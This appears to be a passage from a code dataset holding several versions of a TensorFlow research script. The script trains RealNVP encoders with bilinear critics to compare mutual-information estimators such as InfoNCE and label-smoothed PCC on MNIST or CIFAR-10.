lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n\n loss_fcts = {\n # \"wpc\": wpc_loss,\n \"pcc\": pcc_loss,\n # \"drfc\": drfc_loss,\n #\"nwj\": nwj_loss,\n \"cpc\": cpc_loss,\n # \"skew_pcc\": skew_pcc_loss,\n \"ls_pcc\": ls_pcc_loss,\n \"prels_pcc\": pre_ls_pcc_loss,\n \"adap_pred_pcc\": adap_pred_smooth_pcc_loss,\n \"adap_label_pcc\": adap_label_smooth_pcc_loss\n }\n kwargs = dict(\n shift_only=True,\n activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(stddev=0.0001),\n bias_initializer='zeros')\n nets = {\n \"realnvp\": lambda: (\n RealNVPBijector(DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=kwargs),\n RealNVPBijector(DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=kwargs)\n )\n }\n critics = {\n \"bilinear\": lambda: BilinearCritic(feature_dim=DIMS//2),\n }\n return run_sweep(nets, critics, loss_fcts, \"invertible\", n_iters=21000, n_evals=21)\n\nif RUN_EXPERIMENTS:\n data_invertible = run_all_experiments()[\"df\"]\n data_invertible.to_pickle(RESULT_DIR)\nelse:\n os.system(\"wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl\")\n data_invertible = pd.read_pickle('mi_results.pkl')\n data_invertible = data_invertible[data_invertible.exp_name == \"invertible\"]\n",
"from __future__ import division\nfrom __future__ import print_function\nimport collections\nimport copy\nimport functools\nimport itertools\nimport os\nimport pickle\nimport argparse\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import FuncFormatter\nimport numpy as np\nimport pandas as pd\nfrom scipy.ndimage import gaussian_filter1d\nimport seaborn as sns\nimport tensorflow as tf\nfrom tensorflow.python.ops.parallel_for import gradients\nimport tensorflow_datasets as tfds\nimport tensorflow_probability as tfp\nimport sklearn.linear_model as sk_linear\nparser = argparse.ArgumentParser(description=\n 'Representation Learning Experiments')\nparser.add_argument('--dataset', default='mnist', type=str, help=\n 'cifar10 or mnist')\nparser.add_argument('--lr', default=0.0001, type=float, help='learning rate')\nparser.add_argument('--batch_size', default=100, type=int, help=\n 'mini batch size')\nparser.add_argument('--smoothing', default=0.01, type=float, help=\n 'label smoothing parameter')\nparser.add_argument('--output_dir', type=str, default='./runs', help=\n 'directory where the results will be stored')\nargs = parser.parse_args()\na, b, c = 0.005, 0.1, 0.9\nif not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\nTFDS_NAME = args.dataset\nNRUNS = 10\nif TFDS_NAME == 'mnist':\n DIMS = 784\nelif TFDS_NAME == 'cifar10':\n DIMS = 3072\nLEARNING_RATE = args.lr\nN_CLASSES = 10\nTRAIN_BATCH_SIZE = args.batch_size\nRESULT_DIR = './runs/{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS,\n LEARNING_RATE, TRAIN_BATCH_SIZE)\nRUN_EXPERIMENTS = True\nFEATURE_INPUT = 'image'\nFEATURE_LABEL = 'label'\ntfb = tfp.bijectors\ntfd = tfp.distributions\ntfkl = tf.keras.layers\ntf.keras.backend.clear_session()\nResultsConfig = collections.namedtuple('ResultsConfig', ['nets', 'critic',\n 'loss'])\nResults = collections.namedtuple('Results', ['iterations',\n 'training_losses', 'testing_losses', 'classification_accuracies',\n 'singular_values'])\nResultsAdversarial = collections.namedtuple('ResultsAdversarial', [\n 'losses_e', 'losses_c', 'classification_accuracies', 'iters'])\nResultsSamplingIssues = collections.namedtuple('ResultsSamplingIssues', [\n 'mi_true', 'nce_estimates_noniid', 'nce_estimates_iid',\n 'nwj_estimates_noniid', 'nwj_estimates_iid'])\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\ntf.compat.v1.reset_default_graph()\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\ndataset_train = load_data('train')\ndataset_test = load_data('test')\nx_train, y_train = tfds_to_np(dataset_train)\nx_test, y_test = tfds_to_np(dataset_test)\ntf.compat.v1.reset_default_graph()\nx_train_noisy = x_train + 0.05 * np.random.randn(*x_train.shape)\nx_test_noisy = x_test + 0.05 * np.random.randn(*x_test.shape)\nprint('Fit on half the pixels: {}. It should be around 0.835.'.format(\n logistic_fit(x_train_noisy[:, :DIMS // 2], y_train, x_test_noisy[:, :\n DIMS // 2], y_test)))\n\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data('train')\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched\n ).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n x_1, x_2 = tf.split(features, [dims, DIMS - dims], axis=-1)\n return x_1, x_2, labels\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\nfrom tensorflow_probability.python.internal import tensorshape_util\nimport tensorflow.compat.v1 as tf1\nfrom tensorflow_probability.python.bijectors import affine_scalar\nfrom tensorflow_probability.python.bijectors import bijector as bijector_lib\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\nif RUN_EXPERIMENTS:\n data_invertible = run_all_experiments()['df']\n data_invertible.to_pickle(RESULT_DIR)\nelse:\n os.system(\n 'wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl'\n )\n data_invertible = pd.read_pickle('mi_results.pkl')\n data_invertible = data_invertible[data_invertible.exp_name == 'invertible']\n",
"<import token>\nparser = argparse.ArgumentParser(description=\n 'Representation Learning Experiments')\nparser.add_argument('--dataset', default='mnist', type=str, help=\n 'cifar10 or mnist')\nparser.add_argument('--lr', default=0.0001, type=float, help='learning rate')\nparser.add_argument('--batch_size', default=100, type=int, help=\n 'mini batch size')\nparser.add_argument('--smoothing', default=0.01, type=float, help=\n 'label smoothing parameter')\nparser.add_argument('--output_dir', type=str, default='./runs', help=\n 'directory where the results will be stored')\nargs = parser.parse_args()\na, b, c = 0.005, 0.1, 0.9\nif not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\nTFDS_NAME = args.dataset\nNRUNS = 10\nif TFDS_NAME == 'mnist':\n DIMS = 784\nelif TFDS_NAME == 'cifar10':\n DIMS = 3072\nLEARNING_RATE = args.lr\nN_CLASSES = 10\nTRAIN_BATCH_SIZE = args.batch_size\nRESULT_DIR = './runs/{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS,\n LEARNING_RATE, TRAIN_BATCH_SIZE)\nRUN_EXPERIMENTS = True\nFEATURE_INPUT = 'image'\nFEATURE_LABEL = 'label'\ntfb = tfp.bijectors\ntfd = tfp.distributions\ntfkl = tf.keras.layers\ntf.keras.backend.clear_session()\nResultsConfig = collections.namedtuple('ResultsConfig', ['nets', 'critic',\n 'loss'])\nResults = collections.namedtuple('Results', ['iterations',\n 'training_losses', 'testing_losses', 'classification_accuracies',\n 'singular_values'])\nResultsAdversarial = collections.namedtuple('ResultsAdversarial', [\n 'losses_e', 'losses_c', 'classification_accuracies', 'iters'])\nResultsSamplingIssues = collections.namedtuple('ResultsSamplingIssues', [\n 'mi_true', 'nce_estimates_noniid', 'nce_estimates_iid',\n 'nwj_estimates_noniid', 'nwj_estimates_iid'])\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef 